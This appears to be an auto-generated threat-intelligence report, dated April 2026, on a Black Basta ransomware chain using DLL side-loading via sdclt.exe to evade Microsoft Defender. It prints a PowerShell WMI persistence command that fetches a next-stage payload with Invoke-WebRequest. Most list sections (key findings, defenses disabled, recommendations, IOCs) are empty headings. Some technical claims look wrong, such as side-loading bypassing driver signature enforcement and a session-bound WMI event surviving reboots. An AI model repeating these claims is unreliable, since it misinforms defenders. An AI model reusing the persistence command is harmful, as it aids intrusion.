2026-04-09 | Auto-Generated 2026-04-09 | Oracle-42 Intelligence Research
```html

Black Basta Ransomware Exploits New DLL Side-Loading Technique to Bypass Microsoft Defender in 2026

Executive Summary: In April 2026, researchers at Oracle-42 Intelligence uncovered a sophisticated new attack chain by the Black Basta ransomware group that leverages DLL side-loading to evade Microsoft Defender. This previously undetected technique abuses a legitimate executable, sdclt.exe (Windows Backup and Restore utility), to load a malicious DLL, thereby achieving arbitrary code execution and privilege escalation before disabling security defenses. Unlike prior campaigns, this variant introduces fileless persistence and anti-forensic behaviors, significantly increasing dwell time and operational impact. The flaw—currently unpatched—highlights the urgent need for behavioral detection, privilege hardening, and memory integrity monitoring.

Key Findings

Technical Deep Dive: The 2026 Black Basta Attack Chain

Initial Access and DLL Side-Loading

The campaign begins with a spear-phishing email containing a weaponized ISO file. Once mounted, the ISO contains:

When sdclt.exe is executed, Windows searches for duser.dll in the same directory. Because the ISO is mounted to a removable drive (e.g., E:\), Windows prioritizes loading the malicious DLL over the system-resident version. This bypasses driver signature enforcement and code integrity checks, a technique known as "DLL search order hijacking."

Arbitrary Code Execution and Privilege Escalation

The malicious duser.dll injects shellcode into a high-integrity process (e.g., services.exe), granting SYSTEM privileges. This stage is executed within 3–5 seconds of sdclt.exe launch, minimizing behavioral anomalies.

Defense and Recovery Disablement

Once elevated, the malware:

Fileless Persistence via WMI

Instead of writing to disk, Black Basta creates a WMI event subscription:

Command: powershell -nop -ep bypass -c "Register-WmiEvent -Query 'SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'explorer.exe'' -Action {Invoke-WebRequest ...}"

This triggers the next stage payload upon user login, ensuring persistence even after reboots or Defender reinstalls.

Ransomware Deployment and Encryption

The final payload is a stripped-down version of Black Basta, optimized for speed and stealth. It targets mapped network shares and cloud storage using stolen credentials harvested via in-memory dumping (Mimikatz-style). Encryption uses ChaCha20 with an embedded RSA-4096 public key. The ransom note (README.txt) is written directly to disk only after full encryption—minimizing I/O-based detection.

Why Microsoft Defender Failed

Recommendations for Enterprise Defense

Immediate Mitigations (0–48 Hours)

Medium-Term Strategies (1–4 Weeks)

Long-Term Architectural Improvements

Indicators of Compromise (IOCs) — April 2026